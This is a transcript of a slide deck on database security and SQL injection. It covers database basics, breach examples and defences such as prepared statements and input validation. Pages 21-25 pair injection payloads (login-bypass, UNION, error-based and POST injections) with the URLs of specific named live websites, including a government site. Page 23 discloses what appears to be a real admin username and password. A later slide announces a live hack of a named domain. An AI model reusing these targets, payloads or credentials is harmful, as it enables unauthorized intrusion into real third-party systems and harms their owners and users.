database and database security

32

Upload: rummy-khan

Post on 08-May-2015

1.199 views

Category:

Technology


26 download

DESCRIPTION

Database and Database Security..

TRANSCRIPT

Page 1: Database and Database Security
Page 2: Database and Database Security

DATABASE & DATABASE SECURITY

BYREHAN MANZOOR

Page 3: Database and Database Security

What actually is a database

Code and Filing concept

+

Page 4: Database and Database Security

History of Database

Page 5: Database and Database Security

Major Database Vendors

Page 6: Database and Database Security

Interaction with Database

Page 7: Database and Database Security

How we Interact (Direct Queries)

Page 8: Database and Database Security

Custom defined functions

Page 9: Database and Database Security

Stored Procedures

Page 10: Database and Database Security

Stored Procedures

Page 11: Database and Database Security

Integration with Languages

Page 12: Database and Database Security

Static Apps

Page 13: Database and Database Security

Dynamic Apps

Page 14: Database and Database Security

Need in CMS

Page 15: Database and Database Security

How We Integrate

Well that is the real question how we integrate.. It create a problem when we don’t attach app with a database correctly.. Code is important

Page 16: Database and Database Security

Contents continued..

Database Attacks What is a Database Attack Explanation OWASP Rating (damage rate) Destruction of SQL injection

History Reviews Recent bidding in underground

Page 17: Database and Database Security

Database Attacks

Excessive Privileges Privileges abuse Unauthorized privilege elevation Platform Vulnerabilities Sql Injection Weak Audit Denial of Service

Page 18: Database and Database Security

Top 10 vuln by OWASP

Page 19: Database and Database Security

Destruction of SQL Injection Attack Heartland Payment Systems

This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.

TJXMore than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.

Page 20: Database and Database Security

Recent Bidding in Underground

Page 21: Database and Database Security

Login on Live Sites

http://www.equinet.ch/fr/gestion/login.php 1' OR '1'='1

http://lionsclubofwashim.co.in/admin.php 1' OR '1'='1

admin.axilbusiness.in 1' OR '1'='1

http://www.anemos.in/admin/ 1' OR '1'='1

Query Code

CODEselect username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';

Page 22: Database and Database Security

Union based attack

http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -

http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—

http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –

Codeselect * from tblName where id=‘”+RequestQueryString[‘id’]+”’;

Page 23: Database and Database Security

Error Based Attack

http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -

http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2

http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown

http://www.grabbbit.com/admin/login.aspx userid admin password grabbbit$

Code Select column1,column2,column3, from table1 join table2 on table1.column1 =

table2.column1 where id=‘”+RequestQueryString[‘id’]+”’;

Page 24: Database and Database Security

Blind Attack

fgcineplex.com.sg/Images/slideshow/sizzlingsoul.php

Codewell query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union

Page 25: Database and Database Security

POST Sql Injection

url: http://haryanapolice.gov.in/police/pressreleases/s

earch.asp

Post text1=rummy'&text2=11/11/2010&SUBMIT=sea

rch

Codeselect * from tablename where text1= Request.Form[“text1"].ToString() and text2= Request.Form[“text1"].ToString();

Page 26: Database and Database Security

Why Sql Injection Possible

Who is responsible Database or Programmer

Why Not To Blame Database Database Secure Nature Lack of awareness No research base study Lack of interest Non professional coders

Page 27: Database and Database Security

Detection of SQL Injection

Manual Check Why How By Whom

Automated Check Tools Scanners

Page 28: Database and Database Security

Securing From SQL Injection

Learn About it Firewalls By Code Don’t Disclose any parameter as possible Giving session user least possible rights Blacklisting evil keywords for the session

user User input validation Using prepared statements

Page 29: Database and Database Security

More on Firewalls

USE Of Firewall As it is Customized Buffer overflows Null bytes Difference between a normal user and

Hacker

Page 31: Database and Database Security

Live Hack Of A Website

http://aquaservices.co.in/

Page 32: Database and Database Security

Conclusion

Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.